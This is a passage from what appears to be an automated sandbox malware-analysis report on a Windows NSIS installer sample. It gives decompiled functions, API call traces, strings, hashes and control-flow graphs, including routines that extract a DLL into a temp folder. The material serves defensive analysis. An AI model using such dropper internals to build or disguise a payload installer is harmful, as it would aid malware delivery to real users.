							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4; // 0x7e00
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x0
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0xc1b
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

































                      0x00402c69
                      0x00402c6c
                      0x00402c86
                      0x00402c8b
                      0x00402c9e
                      0x00402ca3
                      0x00402ca9
                      0x00000000
                      0x00402cab
                      0x00402cbc
                      0x00402ccd
                      0x00402cd4
                      0x00402cda
                      0x00402cdc
                      0x00402ce1
                      0x00402ce3
                      0x00402dd3
                      0x00402dd5
                      0x00402dda
                      0x00402de1
                      0x00000000
                      0x00000000
                      0x00402de7
                      0x00402dea
                      0x00402e16
                      0x00402e1b
                      0x00402e26
                      0x00402e28
                      0x00402e39
                      0x00402e54
                      0x00402e5a
                      0x00402e5d
                      0x00402e62
                      0x00402e78
                      0x00402e81
                      0x00402e91
                      0x00402ea3
                      0x00402ea8
                      0x00402ead
                      0x00402eb0
                      0x00402eb9
                      0x00402ebd
                      0x00402ec5
                      0x00402eca
                      0x00402ecc
                      0x00402ecc
                      0x00402ecc
                      0x00402ed4
                      0x00402ed4
                      0x00402ed7
                      0x00402ed8
                      0x00402ed8
                      0x00402edb
                      0x00402edd
                      0x00402edd
                      0x00402edd
                      0x00402ee0
                      0x00402ee7
                      0x00402ef3
                      0x00402ef8
                      0x00000000
                      0x00402ef8
                      0x00000000
                      0x00402eb0
                      0x00000000
                      0x00402e64
                      0x00402df2
                      0x00402dfd
                      0x00402e02
                      0x00402e04
                      0x00000000
                      0x00000000
                      0x00402e0d
                      0x00402e10
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402ce9
                      0x00402ce9
                      0x00402ce9
                      0x00402cee
                      0x00402cf2
                      0x00402cf9
                      0x00402cfe
                      0x00402d00
                      0x00402d02
                      0x00402d02
                      0x00402d0a
                      0x00402d0f
                      0x00402d11
                      0x00402e70
                      0x00402eb2
                      0x00000000
                      0x00402eb2
                      0x00402d17
                      0x00402d1d
                      0x00402d9d
                      0x00402da1
                      0x00402da4
                      0x00402da9
                      0x00000000
                      0x00402da1
                      0x00402d2a
                      0x00402d2f
                      0x00402d32
                      0x00402d37
                      0x00000000
                      0x00000000
                      0x00402d39
                      0x00402d40
                      0x00000000
                      0x00000000
                      0x00402d42
                      0x00402d49
                      0x00000000
                      0x00000000
                      0x00402d4b
                      0x00402d52
                      0x00000000
                      0x00000000
                      0x00402d54
                      0x00402d5b
                      0x00000000
                      0x00000000
                      0x00402d5d
                      0x00402d63
                      0x00402d6c
                      0x00402d72
                      0x00402d75
                      0x00402d77
                      0x00402d7d
                      0x00000000
                      0x00000000
                      0x00402d83
                      0x00402d87
                      0x00402d8f
                      0x00402d8f
                      0x00402d92
                      0x00402d95
                      0x00402d97
                      0x00402d99
                      0x00402d99
                      0x00000000
                      0x00402d97
                      0x00402d89
                      0x00402d8d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402daa
                      0x00402daa
                      0x00402db0
                      0x00402dc0
                      0x00402dc0
                      0x00402dc3
                      0x00402dc9
                      0x00402dcb
                      0x00402dcb
                      0x00000000
                      0x00402ce9

                      APIs
                      • GetTickCount.KERNEL32 ref: 00402C6F
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\nji3Lg1ot6.exe,00000400), ref: 00402C8B
                        • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 00405760
                        • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                      • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nji3Lg1ot6.exe,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 00402CD4
                      • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nji3Lg1ot6.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$hM$soft
                      • API String ID: 2803837635-2753512172
                      • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                      • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                      • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                      • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 328 401778-40177e call 405ce3 322->328 323->328 333 401783-401787 328->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 343 4017a5-4017b7 334->343 344 401795-4017a3 CompareFileTime 334->344 336 4017c5-4017e1 call 40575c 335->336 337 4017bf-4017c0 call 40573d 335->337 345 4017e3-4017e6 336->345 346 401859-401882 call 404e23 call 402f01 336->346 337->336 343->335 344->343 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 360 401884-401888 346->360 361 40188a-401896 SetFileTime 346->361 347->333 380 401830-401831 347->380 358 40184e-401854 348->358 363 402886 358->363 360->361 362 40189c-4018a7 FindCloseChangeNotification 360->362 361->362 365 40287d-402880 362->365 366 4018ad-4018b0 362->366 367 402888-40288c 363->367 365->363 369 4018b2-4018c3 call 405aa7 lstrcatA 366->369 370 4018c5-4018c8 call 405aa7 366->370 376 4018cd-402205 call 405346 369->376 370->376 376->367 384 40264e-402655 376->384 380->358 382 401833-401834 380->382 382->348 384->365
                      C-Code - Quality: 75%
                      			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\hardz\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\hardz\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}
















                      0x00401734
                      0x0040173b
                      0x00401744
                      0x00401747
                      0x0040174a
                      0x0040174f
                      0x00401757
                      0x00401773
                      0x00401759
                      0x00401759
                      0x0040175a
                      0x0040175a
                      0x00401779
                      0x00401783
                      0x00401783
                      0x00401787
                      0x0040178a
                      0x0040178f
                      0x00401791
                      0x00401793
                      0x00401798
                      0x00401798
                      0x004017a3
                      0x004017a3
                      0x004017b4
                      0x004017b6
                      0x004017b6
                      0x004017b7
                      0x004017b7
                      0x004017ba
                      0x004017bd
                      0x004017c0
                      0x004017c0
                      0x004017c7
                      0x004017d6
                      0x004017db
                      0x004017de
                      0x004017e1
                      0x00000000
                      0x00000000
                      0x004017e3
                      0x004017e6
                      0x00401840
                      0x00401845
                      0x004015a8
                      0x0040264e
                      0x0040264e
                      0x0040287d
                      0x00402880
                      0x00402880
                      0x00000000
                      0x004017e8
                      0x004017ee
                      0x004017f9
                      0x00401806
                      0x00401811
                      0x00401827
                      0x00401827
                      0x0040182a
                      0x00000000
                      0x00401830
                      0x00401830
                      0x00401831
                      0x0040184e
                      0x00402886
                      0x00402886
                      0x00402886
                      0x00401833
                      0x00401833
                      0x00401834
                      0x00401492
                      0x00402200
                      0x00402200
                      0x00402200
                      0x00401831
                      0x0040182a
                      0x00402888
                      0x0040288c
                      0x0040288c
                      0x0040185e
                      0x00401863
                      0x00401871
                      0x00401876
                      0x0040187c
                      0x00401880
                      0x00401882
                      0x0040188a
                      0x00401896
                      0x00401884
                      0x00401884
                      0x00401888
                      0x00000000
                      0x00000000
                      0x00401888
                      0x0040189f
                      0x004018a5
                      0x004018a7
                      0x00000000
                      0x004018ad
                      0x004018ad
                      0x004018b0
                      0x004018c8
                      0x004018b2
                      0x004018b5
                      0x004018be
                      0x004018be
                      0x004018cd
                      0x004018d2
                      0x004021fb
                      0x00000000
                      0x004021fb
                      0x00000000

                      APIs
                      • lstrcatA.KERNEL32(00000000,00000000,bxrmcpz,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                      • CompareFileTime.KERNEL32(-00000014,?,bxrmcpz,bxrmcpz,00000000,00000000,bxrmcpz,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                        • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,jefgbrzfgglybaslbprz Setup,NSIS Error), ref: 00405A92
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                      • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp$C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll$bxrmcpz
                      • API String ID: 1941528284-202857354
                      • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                      • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                      • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                      • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 385 402f01-402f10 386 402f12-402f28 SetFilePointer 385->386 387 402f2e-402f39 call 40302c 385->387 386->387 390 403025-403029 387->390 391 402f3f-402f59 ReadFile 387->391 392 403022 391->392 393 402f5f-402f62 391->393 394 403024 392->394 393->392 395 402f68-402f7b call 40302c 393->395 394->390 395->390 398 402f81-402f84 395->398 399 402ff1-402ff7 398->399 400 402f86-402f89 398->400 403 402ff9 399->403 404 402ffc-40300f ReadFile 399->404 401 40301d-403020 400->401 402 402f8f 400->402 401->390 405 402f94-402f9c 402->405 403->404 404->392 406 403011-40301a 404->406 407 402fa1-402fb3 ReadFile 405->407 408 402f9e 405->408 406->401 407->392 409 402fb5-402fb8 407->409 408->407 409->392 410 402fba-402fcf WriteFile 409->410 411 402fd1-402fd4 410->411 412 402fed-402fef 410->412 411->412 413 402fd6-402fe9 411->413 412->394 413->405 414 402feb 413->414 414->401
                      C-Code - Quality: 93%
                      			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423ef8; // 0x58eb
					_t44 = _t31 + _t51;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}


















                      0x00402f06
                      0x00402f10
                      0x00402f12
                      0x00402f19
                      0x00402f1d
                      0x00402f28
                      0x00402f28
                      0x00402f30
                      0x00402f32
                      0x00402f39
                      0x00402f55
                      0x00402f59
                      0x00403022
                      0x00403022
                      0x00000000
                      0x00402f68
                      0x00402f6b
                      0x00402f71
                      0x00402f78
                      0x00402f7b
                      0x00402f84
                      0x00402ff1
                      0x00402ff7
                      0x00402ff9
                      0x00402ff9
                      0x0040300b
                      0x0040300f
                      0x00000000
                      0x00403011
                      0x00403011
                      0x00403014
                      0x0040301a
                      0x00000000
                      0x0040301a
                      0x00402f86
                      0x00402f89
                      0x0040301d
                      0x0040301d
                      0x00402f8f
                      0x00402f94
                      0x00402f94
                      0x00402f9c
                      0x00402f9e
                      0x00402f9e
                      0x00402faf
                      0x00402fb3
                      0x00000000
                      0x00000000
                      0x00402fc7
                      0x00402fcf
                      0x00402fed
                      0x00403024
                      0x00403024
                      0x00402fd6
                      0x00402fd6
                      0x00402fd9
                      0x00402fdc
                      0x00402fdf
                      0x00402fe9
                      0x00000000
                      0x00402feb
                      0x00000000
                      0x00402feb
                      0x00402fe9
                      0x00000000
                      0x00402fcf
                      0x00000000
                      0x00402f94
                      0x00402f89
                      0x00402f84
                      0x00402f7b
                      0x00402f59
                      0x00403025
                      0x00403029

                      APIs
                      • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402F28
                      • ReadFile.KERNELBASE(00409128,00000004,00007DE4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                      • ReadFile.KERNELBASE(00413038,00004000,00007DE4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FAF
                      • WriteFile.KERNELBASE(00000000,00413038,00007DE4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$Read$PointerWrite
                      • String ID: 80A
                      • API String ID: 2113905535-195308239
                      • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                      • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                      • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                      • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040302C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 415 40302c-403055 GetTickCount 416 403196-40319e call 402bc5 415->416 417 40305b-403086 call 4031da SetFilePointer 415->417 422 4031a0-4031a5 416->422 423 40308b-40309d 417->423 424 4030a1-4030af call 4031a8 423->424 425 40309f 423->425 428 4030b5-4030c1 424->428 429 403188-40318b 424->429 425->424 430 4030c7-4030cd 428->430 429->422 431 4030f8-403114 call 405e9d 430->431 432 4030cf-4030d5 430->432 438 403191 431->438 439 403116-40311e 431->439 432->431 434 4030d7-4030f7 call 402bc5 432->434 434->431 440 403193-403194 438->440 441 403120-403136 WriteFile 439->441 442 403152-403158 439->442 440->422 443 403138-40313c 441->443 444 40318d-40318f 441->444 442->438 445 40315a-40315c 442->445 443->444 446 40313e-40314a 443->446 444->440 445->438 447 40315e-403171 445->447 446->430 448 403150 446->448 447->423 449 403177-403186 SetFilePointer 447->449 448->447 449->416
                      C-Code - Quality: 94%
                      			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x3d90c
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					L2:
					_t12 =  *0x417040; // 0x3c9ea
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					while(1) {
						_t46 =  *0x423eb0; // 0x4de368
						if(_t46 != 0) {
							_t47 =  *0x423f40; // 0x0
							if(_t47 == 0) {
								_t22 =  *0x41f048; // 0xc1b
								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
								E00402BC5(0);
							}
						}
						 *0x40afd0 = 0x40b038;
						 *0x40afd4 = 0x8000; // executed
						_t16 = E00405E9D(0x40afb0); // executed
						if(_t16 < 0) {
							break;
						}
						_t39 =  *0x40afd0; // 0x40ce57
						_t40 = _t39 - 0x40b038;
						if(_t40 == 0) {
							__eflags =  *0x40afcc; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t34;
							if(_t34 == 0) {
								break;
							}
							L17:
							_t18 =  *0x41703c; // 0x3d90c
							if(_t18 -  *0x40afa8 + _a4 > 0) {
								goto L2;
							}
							SetFilePointer( *0x409014, _t18, 0, 0); // executed
							goto L23;
						}
						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
						if(_t21 == 0 || _t40 != _v4) {
							_push(0xfffffffe);
							L22:
							_pop(_t17);
							return _t17;
						} else {
							 *0x40afa8 =  *0x40afa8 + _t40;
							_t53 =  *0x40afcc; // 0x0
							if(_t53 != 0) {
								continue;
							}
							goto L17;
						}
					}
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}





















                      0x00403030
                      0x0040303d
                      0x00403050
                      0x00403055
                      0x00403196
                      0x00403198
                      0x00000000
                      0x0040319e
                      0x00403061
                      0x00403074
                      0x0040307a
                      0x00403080
                      0x0040308b
                      0x0040308b
                      0x0040308b
                      0x00403090
                      0x00403095
                      0x0040309d
                      0x0040309f
                      0x0040309f
                      0x004030a8
                      0x004030af
                      0x00000000
                      0x00000000
                      0x004030b5
                      0x004030bb
                      0x004030c1
                      0x004030c7
                      0x004030c7
                      0x004030cd
                      0x004030cf
                      0x004030d5
                      0x004030d7
                      0x004030ed
                      0x004030f2
                      0x004030f7
                      0x004030d5
                      0x004030fd
                      0x00403103
                      0x0040310d
                      0x00403114
                      0x00000000
                      0x00000000
                      0x00403116
                      0x0040311c
                      0x0040311e
                      0x00403152
                      0x00403158
                      0x00000000
                      0x00000000
                      0x0040315a
                      0x0040315c
                      0x00000000
                      0x00000000
                      0x0040315e
                      0x0040315e
                      0x00403171
                      0x00000000
                      0x00000000
                      0x00403180
                      0x00000000
                      0x00403180
                      0x0040312e
                      0x00403136
                      0x0040318d
                      0x00403193
                      0x00403193
                      0x00000000
                      0x0040313e
                      0x0040313e
                      0x00403144
                      0x0040314a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403150
                      0x00403136
                      0x00403191
                      0x00000000
                      0x00403191
                      0x00000000

                      APIs
                      • GetTickCount.KERNEL32 ref: 00403041
